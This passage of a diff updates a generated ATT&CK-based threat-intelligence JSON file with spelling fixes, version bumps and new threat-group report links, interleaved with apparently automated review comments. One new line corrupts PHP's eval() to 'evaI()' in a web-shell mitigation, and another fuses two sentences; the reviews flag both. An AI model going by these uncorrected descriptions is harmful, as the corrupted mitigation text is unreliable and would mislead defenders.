"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, 
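Review bot: The rewritten China Chopper sentence now ends in an empty inline code span (`\n\n``\n\n`) where the example payload is supposed to be, so the text promises "the following short payload" and shows nothing; either restore the snippet the citation refers to or drop the placeholder together with the words "the following short payload". Two pre-existing defects survive on the new side: "gatway" in the third paragraph, and the pseudo-query's final predicate `exe == \"ipconfig.exe) )` is missing its closing quote, which leaves the analytic unparseable as written. This description is carried over from upstream ATT&CK data, so the correction presumably belongs in that source before the file is regenerated.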
@@ -898167,7 +900048,7 @@
 "id": "relationship--6c3ee326-0ce4-449d-8073-3ee0e8185821",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.850Z",
- "modified": "2022-03-30T14:26:51.850Z",
+ "modified": "2023-11-06T20:20:41.652Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
 "relationship_type": "detects",
@@ -898176,10 +900057,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions may set files and directories to be hidden to evade detection mechanisms.",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions may set files and directories to be hidden to evade detection mechanisms.",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -899993,9 +901874,9 @@
 "id": "relationship--6d1cd674-0466-4209-b9b5-7ce45ed359d1",
 "type": "relationship",
 "created": "2020-11-09T16:28:37.751Z",
- "modified": "2020-11-09T16:28:37.751Z",
+ "modified": "2023-11-06T20:13:28.203Z",
 "source_ref": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6",
- "target_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
 "relationship_type": "uses",
 "object_marking_refs": [
 "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -900005,7 +901886,7 @@
 "description": "[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)",
 "x_mitre_deprecated": false,
 "x_mitre_version": "1.0",
- "x_mitre_attack_spec_version": "",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [
 {
 "source_name": "Securelist Brazilian Banking Malware July 2020",
@@ -943687,7 +945568,7 @@
 "id": "relationship--845b89cf-287c-460e-a243-74229e61d856",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.866Z",
- "modified": "2022-03-30T14:26:51.866Z",
+ "modified": "2023-11-06T20:18:26.804Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
 "relationship_type": "detects",
@@ -943696,10 +945577,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc that would aid in the manipulation of data to hide activity",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -976149,7 +978030,7 @@
 "id": "relationship--95b3ea0a-9ecf-440d-8094-7d003ed3dcf6",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.866Z",
- "modified": "2022-04-16T19:41:17.130Z",
+ "modified": "2023-11-06T20:24:42.686Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
 "relationship_type": "detects",
@@ -976158,10 +978039,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/ower, permissions, etc.",
+ "description": "Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.",
 "x_mitre_deprecated": false,
 "x_mitre_version": "0.1",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -981713,7 +983594,7 @@
 "id": "relationship--9879dc61-0fad-4e79-b225-9f529ee67d46",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.863Z",
- "modified": "2022-03-30T14:26:51.863Z",
+ "modified": "2023-11-06T20:23:59.763Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
 "relationship_type": "detects",
@@ -981722,10 +983603,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -1009454,7 +1011335,7 @@
 "id": "relationship--a735d1e1-10bf-42e7-aafd-222b4d24d581",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.845Z",
- "modified": "2022-03-30T14:26:51.845Z",
+ "modified": "2023-11-06T20:22:06.577Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e",
 "relationship_type": "detects",
@@ -1009463,10 +1011344,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -1053875,7 +1055756,7 @@
 "id": "relationship--bfeb4a8f-eefd-440b-9719-26a77d71afd4",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.859Z",
- "modified": "2022-08-23T15:45:41.036Z",
+ "modified": "2023-11-06T20:22:48.411Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
 "relationship_type": "detects",
@@ -1053884,10 +1055765,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.\n\nFile-based signatures may be capable of detecting code obfuscation depending on the methods used.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.\n\nFile-based signatures may be capable of detecting code obfuscation depending on the methods used.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)",
 "x_mitre_deprecated": false,
 "x_mitre_version": "0.1",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [
 {
 "source_name": "Huntress API Hash",
@@ -1054745,7 +1056626,7 @@
 "id": "relationship--c077dd0a-7568-400b-9aad-e0535f356f71",
 "type": "relationship",
 "created": "2021-07-22T22:35:46.142Z",
- "modified": "2021-07-26T13:46:48.249Z",
+ "modified": "2023-11-10T18:21:43.379Z",
 "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
 "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
 "relationship_type": "mitigates",
@@ -1054754,10 +1056635,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Consider disabling functions from web technologies such as PHP\u2019s eval() that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)",
+ "description": "Consider disabling functions from web technologies such as PHP\u2019s `evaI()` that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)",
 "x_mitre_deprecated": false,
 "x_mitre_version": "1.0",
- "x_mitre_attack_spec_version": "",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [
 {
 "source_name": "ITSyndicate Disabling PHP functions",
@@ -1065989,7 +1067870,7 @@
 "id": "relationship--c6dfa59f-88a0-4839-81ff-f4d8dd57696b",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.857Z",
- "modified": "2022-03-30T14:26:51.857Z",
+ "modified": "2023-11-06T20:21:17.840Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
 "relationship_type": "detects",
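Review bot: The new `"description"` line in the first hunk on this line changes PHP's `eval()` to `evaI()` (capital I in place of lowercase l), which is not a PHP function; the old line had the correct spelling, so the only intended change appears to be the added backticks. As written, the mitigation text points a reader at a name that nothing will match (for example in a `disable_functions` list) while the real function stays enabled, so the line should read `PHP\u2019s `eval()` that may be abused for web shells`. Because this file is generated, it is worth tracing the substitution back to the upstream ATT&CK source rather than patching the output, in case the same character corruption occurs in other descriptions.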
@@ -1065998,10 +1067879,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA)",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA)",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [
 {
 "source_name": "Journey into IR ZeroAccess NTFS EA",
@@ -1093805,7 +1095686,7 @@
 "id": "relationship--d5d7b6eb-e4c3-4143-ae0d-41ebdeb2061f",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.838Z",
- "modified": "2022-03-30T14:26:51.838Z",
+ "modified": "2023-11-06T20:23:18.394Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
 "relationship_type": "detects",
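Review bot: The new `"description"` line in the first hunk on this line still reads `user/owner, permissions, may use NTFS file attributes to hide their malicious data`, which fuses the generic File Metadata sentence with a second sentence whose subject is missing; the spelling fix leaves the text ungrammatical. The sibling hunks on the surrounding lines end the same boilerplate with `permissions, etc.`, so this entry presumably lost a sentence boundary and its subject during generation. It should be checked against the upstream source and split back into two sentences rather than carried forward as is.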
@@ -1093814,10 +1095695,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -1151331,7 +1153212,7 @@
 "id": "relationship--f67b8650-0ebb-417f-a755-2e139796ec11",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.841Z",
- "modified": "2022-03-30T14:26:51.841Z",
+ "modified": "2023-11-06T20:17:55.635Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931",
 "relationship_type": "detects",
@@ -1151340,10 +1153221,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc that would aid in the manipulation of data to hide activity",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -1169968,7 +1171849,8 @@
 "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/",
 "https://blog-cert.opmd.fr/dnspionage-retour-factuel-sur-les-attaques-annoncees-dans-differents-medias/",
 "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
- "https://www.trendmicro.com/en_no/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html"
+ "https://www.trendmicro.com/en_no/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html",
+ "https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/"
 ],
 "targets": [],
 "external_description": [],
@@ -1174367,7 +1176249,9 @@
 "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
 "https://cert.gov.ua/article/39518",
 "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/"
+ "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/",
+ "https://cert.gov.ua/article/6123309",
+ "https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology"
 ],
 "targets": [
 "This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Ukrainian energy sector, Eastern Europe. "
@@ -1175215,7 +1177099,8 @@
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
 "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
 "https://www.group-ib.com/blog/muddywater-infrastructure/",
- "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/"
+ "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/",
+ "https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps"
 ],
 "targets": [
 "Israel,Academic Sector,individuals in Asia and the Middle East, government and defense entities in Central and Southwest Asia"
@@ -1177656,10 +1179541,10 @@
 "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "name": "File Metadata",
 "created": "2021-10-20T15:05:19.273Z",
- "modified": "2021-10-20T15:05:19.273Z",
+ "modified": "2023-11-01T21:18:51.941Z",
 "x_mitre_version": "1.0",
 "type": "x-mitre-data-component",
- "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.",
+ "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.",
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
 "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9",
@@ -1177667,7 +1179552,7 @@
 "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
 ],
 "x_mitre_domains": [],
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_attack_spec_version": "3.2.0",
 "x_mitre_deprecated": false,
 "revoked": false,
 "external_references": []
@@ -1180186,7 +1182071,9 @@
 "links": [
 "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain",
 "https://www.cyberscoop.com/saudi-arabia-hackers-it-providers-symantec/",
- "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html"
+ "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html",
+ "https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/"
 ],
 "targets": [
 "IT providers in Saudi Arabia"
@@ -1181821,6 +1183708,7 @@
 "Primitive Bear",
 "Trident Ursa",
 "Iron Tilden",
+ "Hive0051(IBM)",
 "G0047"
 ],
 "external_tools": [
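Review bot: The alias added in the last hunk on this line, `"Hive0051(IBM)"`, embeds the attributing vendor in the alias string, while the neighbouring entries (`"Primitive Bear"`, `"Trident Ursa"`, `"Iron Tilden"`, `"G0047"`) are bare names. If this list is ever used for name matching or deduplication against other feeds, the parenthesised suffix means the plain `Hive0051` will not match; `"Hive0051"` alone would be consistent with its siblings, with the source kept in the links list instead. I cannot see from this hunk whether other alias lists in the file use the `Name(Vendor)` form, so this is a consistency check rather than a definite error.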
@@ -1191714,5 +1193602,5 @@
 ],
 "relationship_map": {},
 "revoked": false,
- "last_updated": "2023-11-01T03:05:33.256448+00:00"
+ "last_updated": "2023-11-15T03:05:35.476604+00:00"
 }
\ No newline at end of file